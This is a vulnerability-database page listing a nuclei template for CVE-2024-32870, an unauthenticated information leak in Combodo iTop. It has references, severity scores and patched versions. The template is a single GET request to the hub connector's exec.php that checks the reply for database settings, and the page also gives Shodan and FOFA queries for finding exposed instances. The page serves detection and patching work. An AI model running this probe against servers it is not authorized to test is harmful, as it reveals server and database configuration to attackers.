Lucene search
K

iTop Hub Connector - Information Disclosure

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

iTop Hub Connector allows unauthorized info access; upgrade to patched versions for security.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-32870
5 Nov 202402:09
circl
CNNVD
Combodo iTop 信息泄露漏洞
4 Nov 202400:00
cnnvd
CVE
CVE-2024-32870
4 Nov 202423:36
cve
Cvelist
CVE-2024-32870 iTop hub connector Information disclosure
4 Nov 202423:36
cvelist
EUVD
EUVD-2024-30653
3 Oct 202520:07
euvd
NVD
CVE-2024-32870
5 Nov 202400:15
nvd
OSV
CVE-2024-32870 iTop hub connector Information disclosure
4 Nov 202423:36
osv
Positive Technologies
PT-2024-24926 · Comodo +1 · Itop +1
4 Nov 202400:00
ptsecurity
Positive Technologies
PT-2024-34874 · Comodo +1 · Itop +1
5 Nov 202400:00
ptsecurity
RedhatCVE
CVE-2024-32870
23 May 202506:22
redhatcve
Rows per page
id: CVE-2024-32870

info:
  name: iTop Hub Connector - Information Disclosure
  author: DhiyaneshDk
  severity: medium
  description: |
    Combodo iTop is a simple, web based IT Service Management tool. Server, OS, DBMS, PHP, and iTop info (name, version and parameters) can be read by anyone having access to iTop URI. This issue has been patched in versions 2.7.11, 3.0.5, 3.1.2, and 3.2.0.
  impact: |
    Unauthenticated attackers can access sensitive server, database, and iTop configuration information.
  remediation: |
    Update iTop to version 2.7.11, 3.0.5, 3.1.2, or 3.2.0 or later.
  reference:
    - https://www.synacktiv.com/en/advisories/multiple-vulnerabilities-on-itop
    - https://github.com/Combodo/iTop/security/advisories/GHSA-rfjh-2f5x-qxmx
    - https://nvd.nist.gov/vuln/detail/CVE-2024-32870
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
    cvss-score: 5.8
    cve-id: CVE-2024-32870
    cwe-id: CWE-200
    epss-score: 0.00731
    epss-percentile: 0.49825
    cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:*
  metadata:
    vendor: combodo
    product: itop
    shodan-query: html:"iTop login"
    fofa-query: body="iTop login"
  tags: cve,cve2024,itop,disclosure,unauth,exposure,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'database_settings'
          - 'database_version'
          - 'database_settings'
          - 'instance_host'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100d1719043f9779680c3b79910890a5e04fb02a1dde1fe02818e16737a0a87383a022022e690375f15ccb2ad60c26f6ec5866a70258eef00fdec160fd953e53cc6ec6a:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7High risk
Vulners AI Score7
CVSS 3.15.8
EPSS0.00731
SSVC
24